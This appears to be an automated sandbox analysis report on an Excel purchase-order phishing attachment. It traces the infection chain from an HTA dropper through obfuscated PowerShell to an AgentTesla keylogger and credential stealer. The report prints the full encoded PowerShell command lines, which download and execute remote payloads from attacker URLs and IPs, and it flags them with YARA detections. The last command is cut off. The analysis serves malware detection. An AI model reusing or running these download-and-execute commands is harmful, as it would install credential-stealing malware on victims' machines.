Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/
Source: mshta.exe, 00000004.00000002.481189241.0000000000558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/b
Source: mshta.exe, 00000004.00000002.481189241.0000000000558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://provit.uk/v
Source: mshta.exe, 00000004.00000002.481189241.00000000004DA000.00000004.00000020.00020000.00000000.sdmp, Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx, 62A30000.0.dr	String found in binary or memory: https://provit.uk/wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2964, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	OLE: Microsoft Excel 2007+
Source: ~DFC601DD9C0FBA6613.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: 62A30000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingswithgreatsituationshandletotheprogress[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: 770B0000 page execute and read and write

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_002DC0F0	18_2_002DC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_002D4920	18_2_002D4920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_002D3908	18_2_002D3908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_002DF3F8	18_2_002DF3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_002D8DB0	18_2_002D8DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_002D3C45	18_2_002D3C45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_002D3C50	18_2_002D3C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_002D8E68	18_2_002D8E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_002DE6E1	18_2_002DE6E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_00531E38	18_2_00531E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_00531750	18_2_00531750

Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

OLE indicator, VBA macros: true

Source: ~DFC601DD9C0FBA6613.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2046
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2482
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2046	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2482	Jump to behavior

Source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2964, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winXLSX@23/34@5/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR9146.tmp

Jump to behavior

Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	OLE indicator, Workbook stream: true
Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr	OLE indicator, Workbook stream: true
Source: 62A30000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............0.m.......m.......................D...............................D......3D.....................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(D.......................m.....}..w......m.......D.......D......1D.....(.P.....P.......X.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w..............D.......D......1D.....(.P.......D......3D......................}..............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................nr.l....}..w.....}......\.F.......D.............(.P.....P.......X.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................}......}..w.............(G......s.l......F.....(.P.....P.......X.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................nr.l....}..w.....}......\.F.......D.............(.P.....P.......X.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................}......}..w.............(G......s.l......F.....(.P.....P.......X.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....8.......N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..(G......s.l......F.....(.P.....P.......X.......8....... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .D.E.v.I.c.e.C.r.E.d.e.n.T.i.a.l.d.E.P.L.o.y.m.e.n.t...E.x.e.P.......X.......8.......@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.P.......X.......8.......@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................}......}..w.............(G......s.l......F.....(.P.....P.......X.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...8.......N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................}......}..w.............(G......s.l......F.....(.P.....P.......X...............l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........}......}..w.............(G......s.l......F.....(.P.....P.......X.......8...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m.....}..w..............D.......D......1D.....(.P.......D......3D.....................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(D.......................m.....}..w......m.......D.......D......1D.....(.P.....................................................	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6826.tmp" "c:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtd